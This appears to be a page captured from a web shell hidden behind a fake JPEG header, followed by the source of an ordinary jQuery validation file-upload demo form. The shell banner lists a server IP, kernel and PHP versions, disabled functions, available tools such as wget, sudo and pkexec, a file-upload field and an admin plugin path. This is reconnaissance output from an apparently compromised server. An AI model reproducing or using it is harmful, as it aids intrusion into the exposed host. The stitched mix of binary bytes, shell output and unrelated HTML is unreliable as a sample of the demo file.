����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.55 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/self/root/var/www/html/admin/assets/plugins/jquery-validation/demo/ |
Upload File : |
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>jQuery validation plug-in - comment form example</title> <link rel="stylesheet" href="css/screen.css" /> <link rel="stylesheet" href="css/cmxform.css" /> <script src="../lib/jquery.js"></script> <script src="../jquery.validate.js"></script> <script src="../additional-methods.js"></script> <script type="text/javascript"> $(document).ready(function() { $("#fileForm").validate(); }); </script> </head> <body> <form class="cmxform" id="fileForm" method="post" action=""> <fieldset> <legend>Select the indicated type of files?</legend> <p> <label for="file1">Select a plain text file (e.g. *.txt)</label> <input type="file" id="file1" name="file1" class="required" accept="text/plain" /> </p> <p> <label for="file2">Select any image file</label> <input type="file" id="file2" name="file2" class="required" accept="image/*"/> </p> <p> <label for="file3">Select either a PDF or a EPS file</label> <input type="file" id="file3" name="file3" class="required" accept="image/x-eps,application/pdf"/> </p> <p> <label for="file4">Select any audio or image file</label> <input type="file" id="file4" name="file4" class="required" accept="image/*,audio/*"/> </p> <p> <label for="file5">Select one or more plain text files (e.g. *.txt)</label> <input type="file" id="file5" name="file5" class="required" multiple accept="text/plain" /> </p> <p> <input class="submit" type="submit" value="Submit"/> </p> </fieldset> </form> </body> </html>